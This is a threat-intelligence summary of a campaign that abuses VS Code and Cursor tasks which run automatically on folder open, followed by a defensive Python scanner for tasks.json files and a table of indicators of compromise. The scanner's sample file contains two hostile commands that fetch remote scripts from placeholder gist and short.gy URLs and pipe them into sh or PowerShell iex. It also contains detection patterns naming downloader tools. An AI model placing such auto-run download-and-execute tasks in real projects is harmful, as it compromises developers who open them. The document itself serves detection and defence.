Contagious Interview: Evolution of VS Code and Cursor Tasks Infection Chains - Part 1

2026-02-25 Abstract Security

https://www.abstract.security/blog/contagious-interview-evolution-of-vscode-and-cursor-tasks-infection-chains


Abstract Security tracks Contagious Interview infection chains that abuse VS Code and Cursor task auto-execution to run downloader commands as soon as a developer opens a booby-trapped project folder. Newer variants stage their scripts through GitHub Gists, short.gy URLs, Google Drive, Vercel, and custom domains, with examples masquerading as NVIDIA or Realtek-related software. The chains target developers, including cryptocurrency and DeFi-adjacent users, and deliver payloads that lead to WeaselStore backdoors or PyArmor-protected Python malware after staged Node.js, batch, and Python execution. Detection opportunities include monitoring for the IDE process (VS Code or Cursor) spawning curl, wget, PowerShell, or a shell running a piped command, and inspecting .vscode/tasks.json files for gist.githubusercontent.com or other staging URLs.
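The tasks.json inspection the report recommends can be automated. The scanner below is an added example written for this page, not code from the Abstract Security report: it strips the comments and trailing commas that VS Code's JSONC format allows, flattens each task's command and args (including the per-OS windows/linux/osx overrides), and flags tasks that are configured to run on folder open ("runOptions": {"runOn": "folderOpen"}), hide their terminal, invoke a downloader, pipe fetched content into a shell, or reference one of the staging hosts named in the report. The embedded tasks.json is constructed for the demonstration; the gist and short.gy URLs inside it are placeholders, not indicators from the report.

```python
import json
import re
import sys

# Staging services named in the report (placeholder hosts only; no report IOCs).
STAGING_HOSTS = {"gist.githubusercontent.com", "short.gy", "drive.google.com"}
STAGING_SUFFIXES = (".vercel.app",)

DOWNLOADER_RE = re.compile(
    r"\b(curl|wget|certutil|bitsadmin|iwr|Invoke-WebRequest|iex|Invoke-Expression)\b", re.I)
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash|zsh|iex|Invoke-Expression|node|python3?)\b", re.I)
URL_HOST_RE = re.compile(r"https?://([^\s/\"'|]+)", re.I)

# Constructed sample .vscode/tasks.json (hypothetical, not from the report).
SAMPLE_TASKS_JSON = r'''{
  // JSONC comment: VS Code tolerates these, json.loads does not
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", "group": "build" },
    {
      "label": "Setup environment",
      "type": "shell",
      "command": "curl -fsSL https://gist.githubusercontent.com/example-user/0000/raw/setup.sh | sh",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    },
    {
      "label": "Install deps",
      "type": "shell",
      "command": "powershell",
      "args": ["-ExecutionPolicy", "Bypass", "-c",
               "iwr https://short.gy/placeholder -UseBasicParsing | iex"],
      "runOptions": { "runOn": "folderOpen" },
    }
  ]
}
'''


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments outside strings, then trailing commas.
    String-aware so that the // in https:// URLs survives."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char verbatim
                out.append(text[i + 1]); i += 2; continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True; out.append(c); i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i); i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2); i = n if j == -1 else j + 2
        else:
            out.append(c); i += 1
    # Trailing-comma removal is a regex, so a literal ",]" inside a string would be altered too.
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def _command_text(task: dict) -> str:
    """Flatten command + args, including windows/linux/osx overrides, into one string."""
    parts = []
    for scope in (task, task.get("windows"), task.get("linux"), task.get("osx")):
        if not isinstance(scope, dict):
            continue
        cmd = scope.get("command")
        if isinstance(cmd, dict):            # quoted-command object form {"value": ..., "quoting": ...}
            cmd = cmd.get("value")
        if isinstance(cmd, str):
            parts.append(cmd)
        for arg in scope.get("args") or []:
            parts.append(arg.get("value", "") if isinstance(arg, dict) else str(arg))
    return " ".join(p for p in parts if p)


def scan_tasks(text: str) -> list:
    """Return a list of {label, command, signals} for tasks worth a closer look."""
    doc = json.loads(strip_jsonc(text))
    findings = []
    for task in doc.get("tasks", []):
        if not isinstance(task, dict):
            continue
        cmd, signals = _command_text(task), []
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            signals.append("auto_run:folderOpen")
        if (task.get("presentation") or {}).get("reveal") == "never":
            signals.append("hidden_terminal")
        if DOWNLOADER_RE.search(cmd):
            signals.append("downloader")
        if PIPE_TO_SHELL_RE.search(cmd):
            signals.append("pipe_to_shell")
        for host in URL_HOST_RE.findall(cmd):
            h = host.lower()
            if h in STAGING_HOSTS or h.endswith(STAGING_SUFFIXES):
                signals.append(f"staging_host:{h}")
        auto_plus = "auto_run:folderOpen" in signals and len(signals) > 1
        remote_code = "pipe_to_shell" in signals or any(s.startswith("staging_host") for s in signals)
        if auto_plus or remote_code:
            findings.append({"label": task.get("label", "<unnamed>"), "command": cmd, "signals": signals})
    return findings


if __name__ == "__main__":
    src = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_TASKS_JSON
    for f in scan_tasks(src):
        print(f"[{', '.join(f['signals'])}] {f['label']}: {f['command']}")
```

Run it with a path to a repository's .vscode/tasks.json, or with no argument to scan the constructed sample. Hits with auto_run:folderOpen deserve the most attention, since those tasks execute on folder open rather than on a click; note that VS Code only runs automatic tasks in a trusted workspace, so declining Workspace Trust for unfamiliar projects and setting task.allowAutomaticTasks to off are the corresponding hardening steps, and a process-level rule for the IDE spawning curl, wget, or PowerShell catches what a static scan of tasks.json misses.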

Indicators of Compromise

Type    Value                               First Seen   Last Seen
HASH    936835c7a98d3b223970a5d2ed63fc97    2026-02-25   2026-02-25
HASH    0959deda4982736d1c1647cff354c665    2026-02-25   2026-02-25
URL     https://nomgwenya.co.za/js/sett…    2026-02-25   2026-02-25
URL     https://camdriver.pro/realtekma…    2026-02-25   2026-02-25
URL     https://postprocesser.com/.well…    2026-02-25   2026-02-25
URL     https://nomgwenya.co.za/js/boot…    2026-02-25   2026-02-25
URL     https://camdriver.pro/realtekwi…    2026-02-25   2026-02-25
DOMAIN  postprocesser.com                   2026-02-25   2026-02-25
DOMAIN  camdriver.pro                       2026-02-25   2026-02-25
DOMAIN  nomgwenya.co.za                     2026-02-25   2026-02-25
